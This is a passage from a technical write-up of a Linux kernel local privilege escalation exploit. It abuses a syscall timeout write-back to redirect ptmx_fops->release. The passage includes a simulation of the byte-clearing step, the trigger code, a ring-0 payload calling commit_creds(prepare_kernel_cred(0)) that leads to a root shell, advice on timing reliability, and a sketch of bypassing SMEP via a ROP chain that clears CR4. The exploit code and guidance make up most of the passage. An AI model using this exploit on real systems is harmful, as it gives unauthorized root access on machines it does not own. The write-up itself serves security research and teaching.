| c0 fe 42 81 ff 00 00 00 | 00 00 00 00 00 xx xx xx | xx xx xx 00 00 00 00 00 |
ptmx_fops->release now points into the memory region that was mapped at the beginning.
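The before and after pictures above can be reproduced with a small user space simulation that never touches the kernel. It replays, on a 24-byte array, what the three syscalls do: each one reads its timeout at entry, and later writes back the remaining time. The helper names are invented for this sketch, the 254.5 second wake-up delay is an assumed value inside the window discussed earlier, and the code assumes a little-endian host such as x86_64.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define NSEC_PER_SEC 1000000000LL

struct ts64 { int64_t tv_sec; int64_t tv_nsec; };

/* Syscall entry: read the 16 bytes at mem+off as a timespec (little-endian host assumed). */
struct ts64 timeout_at_entry(const uint8_t *mem, size_t off)
{
    struct ts64 ts;
    memcpy(&ts.tv_sec, mem + off, 8);
    memcpy(&ts.tv_nsec, mem + off + 8, 8);
    return ts;
}

/* Packet arrival: write the remaining time back, clamping negative results to zero. */
void write_remaining(uint8_t *mem, size_t off, struct ts64 initial, struct ts64 elapsed)
{
    struct ts64 left;

    left.tv_sec = initial.tv_sec - elapsed.tv_sec;
    left.tv_nsec = initial.tv_nsec - elapsed.tv_nsec;
    if (left.tv_nsec < 0) {
        left.tv_sec--;
        left.tv_nsec += NSEC_PER_SEC;
    }
    if (left.tv_sec < 0)
        left.tv_sec = left.tv_nsec = 0;
    memcpy(mem + off, &left.tv_sec, 8);
    memcpy(mem + off + 8, &left.tv_nsec, 8);
}

/*
 * Replay the three children on a copy of the memory at ptmx_fops->release.
 * All three enter the syscall before the first one is woken, and they are
 * woken in the order they were started. Returns the resulting pointer value.
 */
uint64_t simulate_parallel_clear(uint8_t mem[24])
{
    const struct ts64 elapsed = { 254, 500000000 }; /* assumed delay: 254.5 s */
    struct ts64 at_entry[3];
    uint64_t ptr;
    int i;

    for (i = 0; i < 3; i++)
        at_entry[i] = timeout_at_entry(mem, 5 + (size_t)i);
    for (i = 0; i < 3; i++)
        write_remaining(mem, 5 + (size_t)i, at_entry[i], elapsed);

    memcpy(&ptr, mem, sizeof ptr);
    return ptr;
}
```

Starting from c0 fe 42 81 ff ff ff ff followed by sixteen zero bytes, the function returns 0x000000ff8142fec0. The order of the writes matters: child 2 temporarily writes 0xff back into the top byte, and it is child 3, woken last, that finally clears it.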

Code execution in Ring 0

/* ... and trigger. */
printf("releasing file descriptor to call manipulated pointer in kernel mode...\n");
pwn = open("/dev/ptmx", 'r');
close(pwn);

At this point we are ready to execute our payload in ring 0 by opening a file descriptor to /dev/ptmx and immediately closing it, causing the kernel to call ptmx_fops->release in the current context.
Now if all goes well (see restrictions further down) the kernel will jump to our code, change the creds structure of our process to a new one with root privileges (and all capabilities) and return to user mode.
Let's take a closer look at how that is done next.

Kernel payload

int __attribute__((regparm(3)))
kernel_payload(void* foo, void* bar)
{
    _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
    _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;

    /* restore function pointer and following two longs */
    *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1;
    *((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 8)) = 0;
    *((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 16)) = 0;

    /* escalate to root */
    commit_creds(prepare_kernel_cred(0));

    return -1;
}

This is the function copied into the end of the allocated buffer at the beginning. The kernel will execute this code during the close syscall and then return back to user space. The kernel payload uses an old approach which has been documented by Brad Spengler (Spender) in his enlightenment framework [4] (see exploit.c).

Basically, after restoring the manipulated memory region, a new cred structure with full privileges is allocated by prepare_kernel_cred and afterwards passed to commit_creds to install it upon the current task. Since the exploit needs to resolve the tty_release and ptmx_fops symbols anyways this approach was chosen.

It would also be possible to change the credentials without calling any helper functions in the kernel.
This can be done by looking for a pointer to the cred structure stored in the task_struct for the current process, which can in turn be found at the beginning of the kernel stack.
By searching for memory that contains the current process uid and gid and setting those to zero, root privileges can be acquired as well.
For an example demonstrating this technique refer to the semtex.c exploit [5].


if (getuid() != 0) {
    printf("failed to get root :(\n");
    exit(EXIT_FAILURE);
}

printf("got root, enjoy :)\n");
return execl("/bin/bash", "-sh", NULL);

Some notes on reliability

Since the exploit relies on timing it might be unreliable if the exploited system is under very heavy load.
If the kernel fails to reschedule the child process to wake up its parent on time (meaning within a second) the pointer will get corrupted and the exploit will fail, causing a kernel Oops.
In this case a non-threaded exploit which clears the bytes sequentially can be used. You'd want to wait 255 seconds for each byte, which guarantees that the whole timespec structure will be zeroed out when waking up the parent. This approach takes 3 times longer than the parallel version though, so approximately 13 minutes [6]. I have tested the parallel version on a system under heavy load (100% CPU usage) multiple times and have not seen the exploit fail, so I assume this to be more of a theoretical issue (setting up the sockets and rescheduling a process within one second is really no big deal, even under stress).

In theory, the original non-threaded version of this exploit works more reliably than the threaded version, but it does take a while to execute.

Exploit restrictions

Since the exploit tricks the kernel into executing user space pages it can be stopped by SMEP [7]. SMEP causes the CPU to generate a fault if it executes code from a user space page while in kernel mode. Think of SMEP as a kind of DEP/NX for the kernel. To bypass SMEP, bit 20 of CR4 can be cleared through a ROP chain, after which executing code in user space is possible. This technique is described in further detail in [8]. If no gadgets can be found for writing to the CR4 register, exploitation would still be possible by writing the payload entirely in ROP.
Also see the post in [9].

That's it, find the full proof-of-concept exploit code at:

If you have interesting optimizations or alternative implementations let us know via email info/at\